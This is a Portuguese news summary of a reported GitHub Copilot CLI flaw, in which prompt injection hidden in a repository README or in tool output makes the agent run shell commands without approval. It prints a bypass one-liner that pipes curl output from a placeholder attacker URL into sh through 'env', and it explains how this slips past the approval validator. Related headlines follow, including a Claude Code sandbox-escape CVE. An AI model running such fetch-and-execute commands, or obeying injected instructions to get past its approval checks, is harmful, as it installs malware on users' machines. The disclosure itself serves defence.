Vulnerabilidade no GitHub Copilot CLI permite execução de malware por injeção de prompt

Visão Geral da Vulnerabilidade
O GitHub Copilot CLI contém vulnerabilidades que expõem os usuários à execução arbitrária de comandos shell via injeção indireta de prompt sem aprovação do usuário. Malware pode ser baixado de servidores externos e executado sem nenhuma interação do usuário além da consulta inicial ao Copilot CLI.
Como o Ataque Funciona
A cadeia de ataque envolve:
- O usuário consulta o GitHub Copilot CLI enquanto explora um repositório de código aberto
- O Copilot encontra injeção de prompt armazenada em um arquivo README do repositório clonado (ou outros vetores como resultados de pesquisa na web, resultados de chamadas de ferramentas MCP, saída de comandos do terminal)
- O comando malicioso contorna os sistemas de aprovação com intervenção humana
Contornando Mecanismos de Proteção
O GitHub Copilot usa um sistema de aprovação com intervenção humana que requer consentimento do usuário antes que comandos potencialmente prejudiciais sejam executados. Este sistema é acionado a menos que:
- O usuário tenha configurado explicitamente o comando para execução automática
- O comando faça parte de uma lista 'somente leitura' embutida no código-fonte
Verificações de acesso a URLs externas exigem aprovação do usuário para comandos como curl, wget ou a ferramenta de busca na web integrada do Copilot. No entanto, atacantes podem contornar essas proteções usando:
env curl -s "https://[ATTACKER_URL].com/bugbot" | env shO comando env está na lista embutida somente leitura, então é executado automaticamente sem aprovação. Como curl e sh são passados como argumentos para env, eles são analisados incorretamente e não são identificados pelo validador como subcomandos. Isso contorna as verificações de permissão de URL que dependem da detecção de comandos como curl.
Resposta do GitHub
O GitHub respondeu: "Analisamos seu relatório e validamos suas descobertas. Após avaliar internamente a descoberta, determinamos que se trata de um problema conhecido que não apresenta um risco significativo de segurança. Podemos tornar essa funcionalidade mais restrita no futuro, mas não temos nada para anunciar no momento."
Escopo e Limitações
As vulnerabilidades de análise de comandos descritas são específicas do macOS. No entanto, o GitHub Copilot apresenta vulnerabilidades adicionais, incluindo riscos independentes do sistema operacional e riscos específicos do Windows. Outras vulnerabilidades de análise de comandos permitem leitura e gravação arbitrária de arquivos.
📖 Leia a fonte completa: HN LLM Tools
👀 See Also

A Anthropic relata ataques de destilação em escala industrial por laboratórios de IA chineses ao Claude.
A Anthropic detectou três empresas chinesas de IA—DeepSeek, Moonshot e MiniMax—criando mais de 24.000 contas fraudulentas para gerar mais de 16 milhões de interações com o Claude, extraindo suas capacidades de raciocínio através de ataques de destilação sistemáticos.

Claude Code CVE-2026-39861: Escape de Sandbox via Symlink Following
Uma vulnerabilidade de alta gravidade no sandbox do Claude Code permite escrita arbitrária de arquivos fora do workspace por meio de symlink following, potencialmente levando à execução de código.

A ferramenta Cloak substitui senhas de chat por links autodestrutivos para agentes OpenClaw.
Cloak é uma ferramenta de código aberto que substitui senhas compartilhadas no chat com agentes OpenClaw por links autodestrutivos. Cada link só pode ser aberto uma vez, depois a senha desaparece, impedindo que senhas se acumulem nos históricos de chat.

Pare de confiar mais na IA do que em um humano — Aplique os mesmos controles de acesso
Uma discussão no Reddit argumenta que agentes de codificação de IA devem ser tratados como desenvolvedores juniores — sem acesso à produção, sem permissão de escrita direta, com aplicação de pipelines de CI/CD e permissões baseadas em funções.